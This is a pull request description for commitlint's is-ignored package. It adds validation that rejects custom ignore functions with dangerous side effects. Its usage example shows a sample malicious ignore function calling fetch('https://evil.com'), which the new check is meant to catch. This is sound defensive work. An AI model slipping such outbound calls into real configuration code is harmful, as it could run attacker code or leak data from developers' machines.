fix(is-ignored): introduce security validation for custom ignore functions

[edodusi]

Description

This PR improves security validation in the @commitlint/is-ignored package by introducing a regex pattern to catch potentially malicious function calls.

Motivation and Context

The current security validation in is-ignored only performs type validation on the Matcher, this PR adds a more strict check and throws if the function does not returns a Boolean, plus it checks for potentially dangerous side effects (e.g., fetch("url")) that could potentially allow malicious code to be executed through custom ignore functions.

Usage examples

// commitlint.config.js
module.exports = {
  ignores: [
    // This will now be caught as potentially dangerous
    commit => {
      fetch("https://evil.com");
      return true;
    },
    // This remains valid
    commit => commit.includes("fetch")
  ]
};

How Has This Been Tested?

• Added new test cases for various malicious patterns in custom ignore functions
• Added tests for safe patterns to ensure no false positives
• Added tests to verify proper error messages
• Verified all existing tests continue to pass
• Manual testing with various function patterns

Types of changes

• Bug fix (non-breaking change which fixes an issue)
• New feature (non-breaking change which adds functionality)
• Breaking change (fix or feature that would cause existing functionality to change)

Checklist:

• My change requires a change to the documentation.
• I have updated the documentation accordingly.
• I have added tests to cover my changes.
• All new and existing tests passed.

[codesandbox-ci]

This pull request is automatically built and testable in CodeSandbox.

To see build info of the built libraries, click here or the icon next to each commit SHA.